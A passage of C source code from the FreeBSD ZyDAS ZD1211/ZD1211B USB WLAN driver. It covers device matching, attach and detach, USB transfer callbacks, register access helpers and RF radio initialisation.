* WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. */ #include __FBSDID("$FreeBSD$"); /* * ZyDAS ZD1211/ZD1211B USB WLAN driver. */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef INET #include #include #include #include #include #endif #include #include #include #include #include #include #include #include "usbdevs.h" #include #include #ifdef USB_DEBUG static int zyd_debug = 0; static SYSCTL_NODE(_hw_usb, OID_AUTO, zyd, CTLFLAG_RW, 0, "USB zyd"); SYSCTL_INT(_hw_usb_zyd, OID_AUTO, debug, CTLFLAG_RW, &zyd_debug, 0, "zyd debug level"); enum { ZYD_DEBUG_XMIT = 0x00000001, /* basic xmit operation */ ZYD_DEBUG_RECV = 0x00000002, /* basic recv operation */ ZYD_DEBUG_RESET = 0x00000004, /* reset processing */ ZYD_DEBUG_INIT = 0x00000008, /* device init */ ZYD_DEBUG_TX_PROC = 0x00000010, /* tx ISR proc */ ZYD_DEBUG_RX_PROC = 0x00000020, /* rx ISR proc */ ZYD_DEBUG_STATE = 0x00000040, /* 802.11 state transitions */ ZYD_DEBUG_STAT = 0x00000080, /* statistic */ ZYD_DEBUG_FW = 0x00000100, /* firmware */ ZYD_DEBUG_CMD = 0x00000200, /* fw commands */ ZYD_DEBUG_ANY = 0xffffffff }; #define DPRINTF(sc, m, fmt, ...) do { \ if (zyd_debug & (m)) \ printf("%s: " fmt, __func__, ## __VA_ARGS__); \ } while (0) #else #define DPRINTF(sc, m, fmt, ...) do { \ (void) sc; \ } while (0) #endif #define zyd_do_request(sc,req,data) \ usbd_do_request_flags((sc)->sc_udev, &(sc)->sc_mtx, req, data, 0, NULL, 5000) static device_probe_t zyd_match; static device_attach_t zyd_attach; static device_detach_t zyd_detach; static usb_callback_t zyd_intr_read_callback; static usb_callback_t zyd_intr_write_callback; static usb_callback_t zyd_bulk_read_callback; static usb_callback_t zyd_bulk_write_callback; static struct ieee80211vap *zyd_vap_create(struct ieee80211com *, const char [IFNAMSIZ], int, enum ieee80211_opmode, int, const uint8_t [IEEE80211_ADDR_LEN], const uint8_t [IEEE80211_ADDR_LEN]); static void zyd_vap_delete(struct ieee80211vap *); static void zyd_tx_free(struct zyd_tx_data *, int); static void zyd_setup_tx_list(struct zyd_softc *); static void zyd_unsetup_tx_list(struct zyd_softc *); static int zyd_newstate(struct ieee80211vap *, enum ieee80211_state, int); static int zyd_cmd(struct zyd_softc *, uint16_t, const void *, int, void *, int, int); static int zyd_read16(struct zyd_softc *, uint16_t, uint16_t *); static int zyd_read32(struct zyd_softc *, uint16_t, uint32_t *); static int zyd_write16(struct zyd_softc *, uint16_t, uint16_t); static int zyd_write32(struct zyd_softc *, uint16_t, uint32_t); static int zyd_rfwrite(struct zyd_softc *, uint32_t); static int zyd_lock_phy(struct zyd_softc *); static int zyd_unlock_phy(struct zyd_softc *); static int zyd_rf_attach(struct zyd_softc *, uint8_t); static const char *zyd_rf_name(uint8_t); static int zyd_hw_init(struct zyd_softc *); static int zyd_read_pod(struct zyd_softc *); static int zyd_read_eeprom(struct zyd_softc *); static int zyd_get_macaddr(struct zyd_softc *); static int zyd_set_macaddr(struct zyd_softc *, const uint8_t *); static int zyd_set_bssid(struct zyd_softc *, const uint8_t *); static int zyd_switch_radio(struct zyd_softc *, int); static int zyd_set_led(struct zyd_softc *, int, int); static void zyd_set_multi(struct zyd_softc *); static void zyd_update_mcast(struct ifnet *); static int zyd_set_rxfilter(struct zyd_softc *); static void zyd_set_chan(struct zyd_softc *, struct ieee80211_channel *); static int zyd_set_beacon_interval(struct zyd_softc *, int); static void zyd_rx_data(struct usb_xfer *, int, uint16_t); static int zyd_tx_start(struct zyd_softc *, struct mbuf *, struct ieee80211_node *); static void zyd_start(struct ifnet *); static int zyd_raw_xmit(struct ieee80211_node *, struct mbuf *, const struct ieee80211_bpf_params *); static int zyd_ioctl(struct ifnet *, u_long, caddr_t); static void zyd_init_locked(struct zyd_softc *); static void zyd_init(void *); static void zyd_stop(struct zyd_softc *); static int zyd_loadfirmware(struct zyd_softc *); static void zyd_scan_start(struct ieee80211com *); static void zyd_scan_end(struct ieee80211com *); static void zyd_set_channel(struct ieee80211com *); static int zyd_rfmd_init(struct zyd_rf *); static int zyd_rfmd_switch_radio(struct zyd_rf *, int); static int zyd_rfmd_set_channel(struct zyd_rf *, uint8_t); static int zyd_al2230_init(struct zyd_rf *); static int zyd_al2230_switch_radio(struct zyd_rf *, int); static int zyd_al2230_set_channel(struct zyd_rf *, uint8_t); static int zyd_al2230_set_channel_b(struct zyd_rf *, uint8_t); static int zyd_al2230_init_b(struct zyd_rf *); static int zyd_al7230B_init(struct zyd_rf *); static int zyd_al7230B_switch_radio(struct zyd_rf *, int); static int zyd_al7230B_set_channel(struct zyd_rf *, uint8_t); static int zyd_al2210_init(struct zyd_rf *); static int zyd_al2210_switch_radio(struct zyd_rf *, int); static int zyd_al2210_set_channel(struct zyd_rf *, uint8_t); static int zyd_gct_init(struct zyd_rf *); static int zyd_gct_switch_radio(struct zyd_rf *, int); static int zyd_gct_set_channel(struct zyd_rf *, uint8_t); static int zyd_gct_mode(struct zyd_rf *); static int zyd_gct_set_channel_synth(struct zyd_rf *, int, int); static int zyd_gct_write(struct zyd_rf *, uint16_t); static int zyd_gct_txgain(struct zyd_rf *, uint8_t); static int zyd_maxim2_init(struct zyd_rf *); static int zyd_maxim2_switch_radio(struct zyd_rf *, int); static int zyd_maxim2_set_channel(struct zyd_rf *, uint8_t); static const struct zyd_phy_pair zyd_def_phy[] = ZYD_DEF_PHY; static const struct zyd_phy_pair zyd_def_phyB[] = ZYD_DEF_PHYB; /* various supported device vendors/products */ #define ZYD_ZD1211 0 #define ZYD_ZD1211B 1 #define ZYD_ZD1211_DEV(v,p) \ { USB_VPI(USB_VENDOR_##v, USB_PRODUCT_##v##_##p, ZYD_ZD1211) } #define ZYD_ZD1211B_DEV(v,p) \ { USB_VPI(USB_VENDOR_##v, USB_PRODUCT_##v##_##p, ZYD_ZD1211B) } static const STRUCT_USB_HOST_ID zyd_devs[] = { /* ZYD_ZD1211 */ ZYD_ZD1211_DEV(3COM2, 3CRUSB10075), ZYD_ZD1211_DEV(ABOCOM, WL54), ZYD_ZD1211_DEV(ASUS, WL159G), ZYD_ZD1211_DEV(CYBERTAN, TG54USB), ZYD_ZD1211_DEV(DRAYTEK, VIGOR550), ZYD_ZD1211_DEV(PLANEX2, GWUS54GD), ZYD_ZD1211_DEV(PLANEX2, GWUS54GZL), ZYD_ZD1211_DEV(PLANEX3, GWUS54GZ), ZYD_ZD1211_DEV(PLANEX3, GWUS54MINI), ZYD_ZD1211_DEV(SAGEM, XG760A), ZYD_ZD1211_DEV(SENAO, NUB8301), ZYD_ZD1211_DEV(SITECOMEU, WL113), ZYD_ZD1211_DEV(SWEEX, ZD1211), ZYD_ZD1211_DEV(TEKRAM, QUICKWLAN), ZYD_ZD1211_DEV(TEKRAM, ZD1211_1), ZYD_ZD1211_DEV(TEKRAM, ZD1211_2), ZYD_ZD1211_DEV(TWINMOS, G240), ZYD_ZD1211_DEV(UMEDIA, ALL0298V2), ZYD_ZD1211_DEV(UMEDIA, TEW429UB_A), ZYD_ZD1211_DEV(UMEDIA, TEW429UB), ZYD_ZD1211_DEV(WISTRONNEWEB, UR055G), ZYD_ZD1211_DEV(ZCOM, ZD1211), ZYD_ZD1211_DEV(ZYDAS, ZD1211), ZYD_ZD1211_DEV(ZYXEL, AG225H), ZYD_ZD1211_DEV(ZYXEL, ZYAIRG220), ZYD_ZD1211_DEV(ZYXEL, G200V2), /* ZYD_ZD1211B */ ZYD_ZD1211B_DEV(ACCTON, SMCWUSBG_NF), ZYD_ZD1211B_DEV(ACCTON, SMCWUSBG), ZYD_ZD1211B_DEV(ACCTON, ZD1211B), ZYD_ZD1211B_DEV(ASUS, A9T_WIFI), ZYD_ZD1211B_DEV(BELKIN, F5D7050_V4000), ZYD_ZD1211B_DEV(BELKIN, ZD1211B), ZYD_ZD1211B_DEV(CISCOLINKSYS, WUSBF54G), ZYD_ZD1211B_DEV(FIBERLINE, WL430U), ZYD_ZD1211B_DEV(MELCO, KG54L), ZYD_ZD1211B_DEV(PHILIPS, SNU5600), ZYD_ZD1211B_DEV(PLANEX2, GW_US54GXS), ZYD_ZD1211B_DEV(SAGEM, XG76NA), ZYD_ZD1211B_DEV(SITECOMEU, ZD1211B), ZYD_ZD1211B_DEV(UMEDIA, TEW429UBC1), ZYD_ZD1211B_DEV(USR, USR5423), ZYD_ZD1211B_DEV(VTECH, ZD1211B), ZYD_ZD1211B_DEV(ZCOM, ZD1211B), ZYD_ZD1211B_DEV(ZYDAS, ZD1211B), ZYD_ZD1211B_DEV(ZYXEL, M202), ZYD_ZD1211B_DEV(ZYXEL, G202), ZYD_ZD1211B_DEV(ZYXEL, G220V2) }; static const struct usb_config zyd_config[ZYD_N_TRANSFER] = { [ZYD_BULK_WR] = { .type = UE_BULK, .endpoint = UE_ADDR_ANY, .direction = UE_DIR_OUT, .bufsize = ZYD_MAX_TXBUFSZ, .flags = {.pipe_bof = 1,.force_short_xfer = 1,}, .callback = zyd_bulk_write_callback, .ep_index = 0, .timeout = 10000, /* 10 seconds */ }, [ZYD_BULK_RD] = { .type = UE_BULK, .endpoint = UE_ADDR_ANY, .direction = UE_DIR_IN, .bufsize = ZYX_MAX_RXBUFSZ, .flags = {.pipe_bof = 1,.short_xfer_ok = 1,}, .callback = zyd_bulk_read_callback, .ep_index = 0, }, [ZYD_INTR_WR] = { .type = UE_BULK_INTR, .endpoint = UE_ADDR_ANY, .direction = UE_DIR_OUT, .bufsize = sizeof(struct zyd_cmd), .flags = {.pipe_bof = 1,.force_short_xfer = 1,}, .callback = zyd_intr_write_callback, .timeout = 1000, /* 1 second */ .ep_index = 1, }, [ZYD_INTR_RD] = { .type = UE_INTERRUPT, .endpoint = UE_ADDR_ANY, .direction = UE_DIR_IN, .bufsize = sizeof(struct zyd_cmd), .flags = {.pipe_bof = 1,.short_xfer_ok = 1,}, .callback = zyd_intr_read_callback, }, }; #define zyd_read16_m(sc, val, data) do { \ error = zyd_read16(sc, val, data); \ if (error != 0) \ goto fail; \ } while (0) #define zyd_write16_m(sc, val, data) do { \ error = zyd_write16(sc, val, data); \ if (error != 0) \ goto fail; \ } while (0) #define zyd_read32_m(sc, val, data) do { \ error = zyd_read32(sc, val, data); \ if (error != 0) \ goto fail; \ } while (0) #define zyd_write32_m(sc, val, data) do { \ error = zyd_write32(sc, val, data); \ if (error != 0) \ goto fail; \ } while (0) static int zyd_match(device_t dev) { struct usb_attach_arg *uaa = device_get_ivars(dev); if (uaa->usb_mode != USB_MODE_HOST) return (ENXIO); if (uaa->info.bConfigIndex != ZYD_CONFIG_INDEX) return (ENXIO); if (uaa->info.bIfaceIndex != ZYD_IFACE_INDEX) return (ENXIO); return (usbd_lookup_id_by_uaa(zyd_devs, sizeof(zyd_devs), uaa)); } static int zyd_attach(device_t dev) { struct usb_attach_arg *uaa = device_get_ivars(dev); struct zyd_softc *sc = device_get_softc(dev); struct ifnet *ifp; struct ieee80211com *ic; uint8_t iface_index, bands; int error; if (uaa->info.bcdDevice < 0x4330) { device_printf(dev, "device version mismatch: 0x%X " "(only >= 43.30 supported)\n", uaa->info.bcdDevice); return (EINVAL); } device_set_usb_desc(dev); sc->sc_dev = dev; sc->sc_udev = uaa->device; sc->sc_macrev = USB_GET_DRIVER_INFO(uaa); mtx_init(&sc->sc_mtx, device_get_nameunit(sc->sc_dev), MTX_NETWORK_LOCK, MTX_DEF); STAILQ_INIT(&sc->sc_rqh); iface_index = ZYD_IFACE_INDEX; error = usbd_transfer_setup(uaa->device, &iface_index, sc->sc_xfer, zyd_config, ZYD_N_TRANSFER, sc, &sc->sc_mtx); if (error) { device_printf(dev, "could not allocate USB transfers, " "err=%s\n", usbd_errstr(error)); goto detach; } ZYD_LOCK(sc); if ((error = zyd_get_macaddr(sc)) != 0) { device_printf(sc->sc_dev, "could not read EEPROM\n"); ZYD_UNLOCK(sc); goto detach; } ZYD_UNLOCK(sc); ifp = sc->sc_ifp = if_alloc(IFT_IEEE80211); if (ifp == NULL) { device_printf(sc->sc_dev, "can not if_alloc()\n"); goto detach; } ifp->if_softc = sc; if_initname(ifp, "zyd", device_get_unit(sc->sc_dev)); ifp->if_flags = IFF_BROADCAST | IFF_SIMPLEX | IFF_MULTICAST; ifp->if_init = zyd_init; ifp->if_ioctl = zyd_ioctl; ifp->if_start = zyd_start; IFQ_SET_MAXLEN(&ifp->if_snd, ifqmaxlen); IFQ_SET_READY(&ifp->if_snd); ic = ifp->if_l2com; ic->ic_ifp = ifp; ic->ic_phytype = IEEE80211_T_OFDM; /* not only, but not used */ ic->ic_opmode = IEEE80211_M_STA; /* set device capabilities */ ic->ic_caps = IEEE80211_C_STA /* station mode */ | IEEE80211_C_MONITOR /* monitor mode */ | IEEE80211_C_SHPREAMBLE /* short preamble supported */ | IEEE80211_C_SHSLOT /* short slot time supported */ | IEEE80211_C_BGSCAN /* capable of bg scanning */ | IEEE80211_C_WPA /* 802.11i */ ; bands = 0; setbit(&bands, IEEE80211_MODE_11B); setbit(&bands, IEEE80211_MODE_11G); ieee80211_init_channels(ic, NULL, &bands); ieee80211_ifattach(ic, sc->sc_bssid); ic->ic_raw_xmit = zyd_raw_xmit; ic->ic_scan_start = zyd_scan_start; ic->ic_scan_end = zyd_scan_end; ic->ic_set_channel = zyd_set_channel; ic->ic_vap_create = zyd_vap_create; ic->ic_vap_delete = zyd_vap_delete; ic->ic_update_mcast = zyd_update_mcast; ic->ic_update_promisc = zyd_update_mcast; ieee80211_radiotap_attach(ic, &sc->sc_txtap.wt_ihdr, sizeof(sc->sc_txtap), ZYD_TX_RADIOTAP_PRESENT, &sc->sc_rxtap.wr_ihdr, sizeof(sc->sc_rxtap), ZYD_RX_RADIOTAP_PRESENT); if (bootverbose) ieee80211_announce(ic); return (0); detach: zyd_detach(dev); return (ENXIO); /* failure */ } static int zyd_detach(device_t dev) { struct zyd_softc *sc = device_get_softc(dev); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic; unsigned int x; /* * Prevent further allocations from RX/TX data * lists and ioctls: */ ZYD_LOCK(sc); sc->sc_flags |= ZYD_FLAG_DETACHED; STAILQ_INIT(&sc->tx_q); STAILQ_INIT(&sc->tx_free); ZYD_UNLOCK(sc); /* drain USB transfers */ for (x = 0; x != ZYD_N_TRANSFER; x++) usbd_transfer_drain(sc->sc_xfer[x]); /* free TX list, if any */ ZYD_LOCK(sc); zyd_unsetup_tx_list(sc); ZYD_UNLOCK(sc); /* free USB transfers and some data buffers */ usbd_transfer_unsetup(sc->sc_xfer, ZYD_N_TRANSFER); if (ifp) { ic = ifp->if_l2com; ieee80211_ifdetach(ic); if_free(ifp); } mtx_destroy(&sc->sc_mtx); return (0); } static struct ieee80211vap * zyd_vap_create(struct ieee80211com *ic, const char name[IFNAMSIZ], int unit, enum ieee80211_opmode opmode, int flags, const uint8_t bssid[IEEE80211_ADDR_LEN], const uint8_t mac[IEEE80211_ADDR_LEN]) { struct zyd_vap *zvp; struct ieee80211vap *vap; if (!TAILQ_EMPTY(&ic->ic_vaps)) /* only one at a time */ return (NULL); zvp = (struct zyd_vap *) malloc(sizeof(struct zyd_vap), M_80211_VAP, M_NOWAIT | M_ZERO); if (zvp == NULL) return (NULL); vap = &zvp->vap; /* enable s/w bmiss handling for sta mode */ if (ieee80211_vap_setup(ic, vap, name, unit, opmode, flags | IEEE80211_CLONE_NOBEACONS, bssid, mac) != 0) { /* out of memory */ free(zvp, M_80211_VAP); return (NULL); } /* override state transition machine */ zvp->newstate = vap->iv_newstate; vap->iv_newstate = zyd_newstate; ieee80211_ratectl_init(vap); ieee80211_ratectl_setinterval(vap, 1000 /* 1 sec */); /* complete setup */ ieee80211_vap_attach(vap, ieee80211_media_change, ieee80211_media_status); ic->ic_opmode = opmode; return (vap); } static void zyd_vap_delete(struct ieee80211vap *vap) { struct zyd_vap *zvp = ZYD_VAP(vap); ieee80211_ratectl_deinit(vap); ieee80211_vap_detach(vap); free(zvp, M_80211_VAP); } static void zyd_tx_free(struct zyd_tx_data *data, int txerr) { struct zyd_softc *sc = data->sc; if (data->m != NULL) { if (data->m->m_flags & M_TXCB) ieee80211_process_callback(data->ni, data->m, txerr ? ETIMEDOUT : 0); m_freem(data->m); data->m = NULL; ieee80211_free_node(data->ni); data->ni = NULL; } STAILQ_INSERT_TAIL(&sc->tx_free, data, next); sc->tx_nfree++; } static void zyd_setup_tx_list(struct zyd_softc *sc) { struct zyd_tx_data *data; int i; sc->tx_nfree = 0; STAILQ_INIT(&sc->tx_q); STAILQ_INIT(&sc->tx_free); for (i = 0; i < ZYD_TX_LIST_CNT; i++) { data = &sc->tx_data[i]; data->sc = sc; STAILQ_INSERT_TAIL(&sc->tx_free, data, next); sc->tx_nfree++; } } static void zyd_unsetup_tx_list(struct zyd_softc *sc) { struct zyd_tx_data *data; int i; /* make sure any subsequent use of the queues will fail */ sc->tx_nfree = 0; STAILQ_INIT(&sc->tx_q); STAILQ_INIT(&sc->tx_free); /* free up all node references and mbufs */ for (i = 0; i < ZYD_TX_LIST_CNT; i++) { data = &sc->tx_data[i]; if (data->m != NULL) { m_freem(data->m); data->m = NULL; } if (data->ni != NULL) { ieee80211_free_node(data->ni); data->ni = NULL; } } } static int zyd_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct zyd_vap *zvp = ZYD_VAP(vap); struct ieee80211com *ic = vap->iv_ic; struct zyd_softc *sc = ic->ic_ifp->if_softc; int error; DPRINTF(sc, ZYD_DEBUG_STATE, "%s: %s -> %s\n", __func__, ieee80211_state_name[vap->iv_state], ieee80211_state_name[nstate]); IEEE80211_UNLOCK(ic); ZYD_LOCK(sc); switch (nstate) { case IEEE80211_S_AUTH: zyd_set_chan(sc, ic->ic_curchan); break; case IEEE80211_S_RUN: if (vap->iv_opmode == IEEE80211_M_MONITOR) break; /* turn link LED on */ error = zyd_set_led(sc, ZYD_LED1, 1); if (error != 0) break; /* make data LED blink upon Tx */ zyd_write32_m(sc, sc->sc_fwbase + ZYD_FW_LINK_STATUS, 1); IEEE80211_ADDR_COPY(sc->sc_bssid, vap->iv_bss->ni_bssid); zyd_set_bssid(sc, sc->sc_bssid); break; default: break; } fail: ZYD_UNLOCK(sc); IEEE80211_LOCK(ic); return (zvp->newstate(vap, nstate, arg)); } /* * Callback handler for interrupt transfer */ static void zyd_intr_read_callback(struct usb_xfer *xfer, usb_error_t error) { struct zyd_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); struct ieee80211_node *ni; struct zyd_cmd *cmd = &sc->sc_ibuf; struct usb_page_cache *pc; int datalen; int actlen; usbd_xfer_status(xfer, &actlen, NULL, NULL, NULL); switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: pc = usbd_xfer_get_frame(xfer, 0); usbd_copy_out(pc, 0, cmd, sizeof(*cmd)); switch (le16toh(cmd->code)) { case ZYD_NOTIF_RETRYSTATUS: { struct zyd_notif_retry *retry = (struct zyd_notif_retry *)cmd->data; DPRINTF(sc, ZYD_DEBUG_TX_PROC, "retry intr: rate=0x%x addr=%s count=%d (0x%x)\n", le16toh(retry->rate), ether_sprintf(retry->macaddr), le16toh(retry->count)&0xff, le16toh(retry->count)); /* * Find the node to which the packet was sent and * update its retry statistics. In BSS mode, this node * is the AP we're associated to so no lookup is * actually needed. */ ni = ieee80211_find_txnode(vap, retry->macaddr); if (ni != NULL) { int retrycnt = (int)(le16toh(retry->count) & 0xff); ieee80211_ratectl_tx_complete(vap, ni, IEEE80211_RATECTL_TX_FAILURE, &retrycnt, NULL); ieee80211_free_node(ni); } if (le16toh(retry->count) & 0x100) ifp->if_oerrors++; /* too many retries */ break; } case ZYD_NOTIF_IORD: { struct zyd_rq *rqp; if (le16toh(*(uint16_t *)cmd->data) == ZYD_CR_INTERRUPT) break; /* HMAC interrupt */ datalen = actlen - sizeof(cmd->code); datalen -= 2; /* XXX: padding? */ STAILQ_FOREACH(rqp, &sc->sc_rqh, rq) { int i; int count; if (rqp->olen != datalen) continue; count = rqp->olen / sizeof(struct zyd_pair); for (i = 0; i < count; i++) { if (*(((const uint16_t *)rqp->idata) + i) != (((struct zyd_pair *)cmd->data) + i)->reg) break; } if (i != count) continue; /* copy answer into caller-supplied buffer */ memcpy(rqp->odata, cmd->data, rqp->olen); DPRINTF(sc, ZYD_DEBUG_CMD, "command %p complete, data = %*D \n", rqp, rqp->olen, (char *)rqp->odata, ":"); wakeup(rqp); /* wakeup caller */ break; } if (rqp == NULL) { device_printf(sc->sc_dev, "unexpected IORD notification %*D\n", datalen, cmd->data, ":"); } break; } default: device_printf(sc->sc_dev, "unknown notification %x\n", le16toh(cmd->code)); } /* FALLTHROUGH */ case USB_ST_SETUP: tr_setup: usbd_xfer_set_frame_len(xfer, 0, usbd_xfer_max_len(xfer)); usbd_transfer_submit(xfer); break; default: /* Error */ DPRINTF(sc, ZYD_DEBUG_CMD, "error = %s\n", usbd_errstr(error)); if (error != USB_ERR_CANCELLED) { /* try to clear stall first */ usbd_xfer_set_stall(xfer); goto tr_setup; } break; } } static void zyd_intr_write_callback(struct usb_xfer *xfer, usb_error_t error) { struct zyd_softc *sc = usbd_xfer_softc(xfer); struct zyd_rq *rqp, *cmd; struct usb_page_cache *pc; switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: cmd = usbd_xfer_get_priv(xfer); DPRINTF(sc, ZYD_DEBUG_CMD, "command %p transferred\n", cmd); STAILQ_FOREACH(rqp, &sc->sc_rqh, rq) { /* Ensure the cached rq pointer is still valid */ if (rqp == cmd && (rqp->flags & ZYD_CMD_FLAG_READ) == 0) wakeup(rqp); /* wakeup caller */ } /* FALLTHROUGH */ case USB_ST_SETUP: tr_setup: STAILQ_FOREACH(rqp, &sc->sc_rqh, rq) { if (rqp->flags & ZYD_CMD_FLAG_SENT) continue; pc = usbd_xfer_get_frame(xfer, 0); usbd_copy_in(pc, 0, rqp->cmd, rqp->ilen); usbd_xfer_set_frame_len(xfer, 0, rqp->ilen); usbd_xfer_set_priv(xfer, rqp); rqp->flags |= ZYD_CMD_FLAG_SENT; usbd_transfer_submit(xfer); break; } break; default: /* Error */ DPRINTF(sc, ZYD_DEBUG_ANY, "error = %s\n", usbd_errstr(error)); if (error != USB_ERR_CANCELLED) { /* try to clear stall first */ usbd_xfer_set_stall(xfer); goto tr_setup; } break; } } static int zyd_cmd(struct zyd_softc *sc, uint16_t code, const void *idata, int ilen, void *odata, int olen, int flags) { struct zyd_cmd cmd; struct zyd_rq rq; int error; if (ilen > (int)sizeof(cmd.data)) return (EINVAL); cmd.code = htole16(code); memcpy(cmd.data, idata, ilen); DPRINTF(sc, ZYD_DEBUG_CMD, "sending cmd %p = %*D\n", &rq, ilen, idata, ":"); rq.cmd = &cmd; rq.idata = idata; rq.odata = odata; rq.ilen = sizeof(uint16_t) + ilen; rq.olen = olen; rq.flags = flags; STAILQ_INSERT_TAIL(&sc->sc_rqh, &rq, rq); usbd_transfer_start(sc->sc_xfer[ZYD_INTR_RD]); usbd_transfer_start(sc->sc_xfer[ZYD_INTR_WR]); /* wait at most one second for command reply */ error = mtx_sleep(&rq, &sc->sc_mtx, 0 , "zydcmd", hz); if (error) device_printf(sc->sc_dev, "command timeout\n"); STAILQ_REMOVE(&sc->sc_rqh, &rq, zyd_rq, rq); DPRINTF(sc, ZYD_DEBUG_CMD, "finsihed cmd %p, error = %d \n", &rq, error); return (error); } static int zyd_read16(struct zyd_softc *sc, uint16_t reg, uint16_t *val) { struct zyd_pair tmp; int error; reg = htole16(reg); error = zyd_cmd(sc, ZYD_CMD_IORD, ®, sizeof(reg), &tmp, sizeof(tmp), ZYD_CMD_FLAG_READ); if (error == 0) *val = le16toh(tmp.val); return (error); } static int zyd_read32(struct zyd_softc *sc, uint16_t reg, uint32_t *val) { struct zyd_pair tmp[2]; uint16_t regs[2]; int error; regs[0] = htole16(ZYD_REG32_HI(reg)); regs[1] = htole16(ZYD_REG32_LO(reg)); error = zyd_cmd(sc, ZYD_CMD_IORD, regs, sizeof(regs), tmp, sizeof(tmp), ZYD_CMD_FLAG_READ); if (error == 0) *val = le16toh(tmp[0].val) << 16 | le16toh(tmp[1].val); return (error); } static int zyd_write16(struct zyd_softc *sc, uint16_t reg, uint16_t val) { struct zyd_pair pair; pair.reg = htole16(reg); pair.val = htole16(val); return zyd_cmd(sc, ZYD_CMD_IOWR, &pair, sizeof(pair), NULL, 0, 0); } static int zyd_write32(struct zyd_softc *sc, uint16_t reg, uint32_t val) { struct zyd_pair pair[2]; pair[0].reg = htole16(ZYD_REG32_HI(reg)); pair[0].val = htole16(val >> 16); pair[1].reg = htole16(ZYD_REG32_LO(reg)); pair[1].val = htole16(val & 0xffff); return zyd_cmd(sc, ZYD_CMD_IOWR, pair, sizeof(pair), NULL, 0, 0); } static int zyd_rfwrite(struct zyd_softc *sc, uint32_t val) { struct zyd_rf *rf = &sc->sc_rf; struct zyd_rfwrite_cmd req; uint16_t cr203; int error, i; zyd_read16_m(sc, ZYD_CR203, &cr203); cr203 &= ~(ZYD_RF_IF_LE | ZYD_RF_CLK | ZYD_RF_DATA); req.code = htole16(2); req.width = htole16(rf->width); for (i = 0; i < rf->width; i++) { req.bit[i] = htole16(cr203); if (val & (1 << (rf->width - 1 - i))) req.bit[i] |= htole16(ZYD_RF_DATA); } error = zyd_cmd(sc, ZYD_CMD_RFCFG, &req, 4 + 2 * rf->width, NULL, 0, 0); fail: return (error); } static int zyd_rfwrite_cr(struct zyd_softc *sc, uint32_t val) { int error; zyd_write16_m(sc, ZYD_CR244, (val >> 16) & 0xff); zyd_write16_m(sc, ZYD_CR243, (val >> 8) & 0xff); zyd_write16_m(sc, ZYD_CR242, (val >> 0) & 0xff); fail: return (error); } static int zyd_lock_phy(struct zyd_softc *sc) { int error; uint32_t tmp; zyd_read32_m(sc, ZYD_MAC_MISC, &tmp); tmp &= ~ZYD_UNLOCK_PHY_REGS; zyd_write32_m(sc, ZYD_MAC_MISC, tmp); fail: return (error); } static int zyd_unlock_phy(struct zyd_softc *sc) { int error; uint32_t tmp; zyd_read32_m(sc, ZYD_MAC_MISC, &tmp); tmp |= ZYD_UNLOCK_PHY_REGS; zyd_write32_m(sc, ZYD_MAC_MISC, tmp); fail: return (error); } /* * RFMD RF methods. */ static int zyd_rfmd_init(struct zyd_rf *rf) { #define N(a) ((int)(sizeof(a) / sizeof((a)[0]))) struct zyd_softc *sc = rf->rf_sc; static const struct zyd_phy_pair phyini[] = ZYD_RFMD_PHY; static const uint32_t rfini[] = ZYD_RFMD_RF; int i, error; /* init RF-dependent PHY registers */ for (i = 0; i < N(phyini); i++) { zyd_write16_m(sc, phyini[i].reg, phyini[i].val); } /* init RFMD radio */ for (i = 0; i < N(rfini); i++) { if ((error = zyd_rfwrite(sc, rfini[i])) != 0) return (error); } fail: return (error); #undef N } static int zyd_rfmd_switch_radio(struct zyd_rf *rf, int on) { int error; struct zyd_softc *sc = rf->rf_sc; zyd_write16_m(sc, ZYD_CR10, on ? 0x89 : 0x15); zyd_write16_m(sc, ZYD_CR11, on ? 0x00 : 0x81); fail: return (error); } static int zyd_rfmd_set_channel(struct zyd_rf *rf, uint8_t chan) { int error; struct zyd_softc *sc = rf->rf_sc; static const struct { uint32_t r1, r2; } rfprog[] = ZYD_RFMD_CHANTABLE; error = zyd_rfwrite(sc, rfprog[chan - 1].r1); if (error != 0) goto fail; error = zyd_rfwrite(sc, rfprog[chan - 1].r2); if (error != 0) goto fail; fail: return (error); } /* * AL2230 RF methods. */ static int zyd_al2230_init(struct zyd_rf *rf) { #define N(a) ((int)(sizeof(a) / sizeof((a)[0]))) struct zyd_softc *sc = rf->rf_sc; static const struct zyd_phy_pair phyini[] = ZYD_AL2230_PHY; static const struct zyd_phy_pair phy2230s[] = ZYD_AL2230S_PHY_INIT; static const struct zyd_phy_pair phypll[] = { { ZYD_CR251, 0x2f }, { ZYD_CR251, 0x3f }, { ZYD_CR138, 0x28 }, { ZYD_CR203, 0x06 } }; static const uint32_t rfini1[] = ZYD_AL2230_RF_PART1; static const uint32_t rfini2[] = ZYD_AL2230_RF_PART2; static const uint32_t rfini3[] = ZYD_AL2230_RF_PART3; int i, error; /* init RF-dependent PHY registers */ for (i = 0; i < N(phyini); i++) zyd_write16_m(sc, phyini[i].reg, phyini[i].val); if (sc->sc_rfrev == ZYD_RF_AL2230S || sc->sc_al2230s != 0) { for (i = 0; i < N(phy2230s); i++) zyd_write16_m(sc, phy2230s[i].reg, phy2230s[i].val); } /* init AL2230 radio */ for (i = 0; i < N(rfini1); i++) { error = zyd_rfwrite(sc, rfini1[i]); if (error != 0) goto fail; } if (sc->sc_rfrev == ZYD_RF_AL2230S || sc->sc_al2230s != 0) error = zyd_rfwrite(sc, 0x000824); else error = zyd_rfwrite(sc, 0x0005a4); if (error != 0) goto fail; for (i = 0; i < N(rfini2); i++) { error = zyd_rfwrite(sc, rfini2[i]); if (error != 0) goto fail; } for (i = 0; i < N(phypll); i++) zyd_write16_m(sc, phypll[i].reg, phypll[i].val); for (i = 0; i < N(rfini3); i++) { error = zyd_rfwrite(sc, rfini3[i]); if (error != 0) goto fail; } fail: return (error); #undef N } static int zyd_al2230_fini(struct 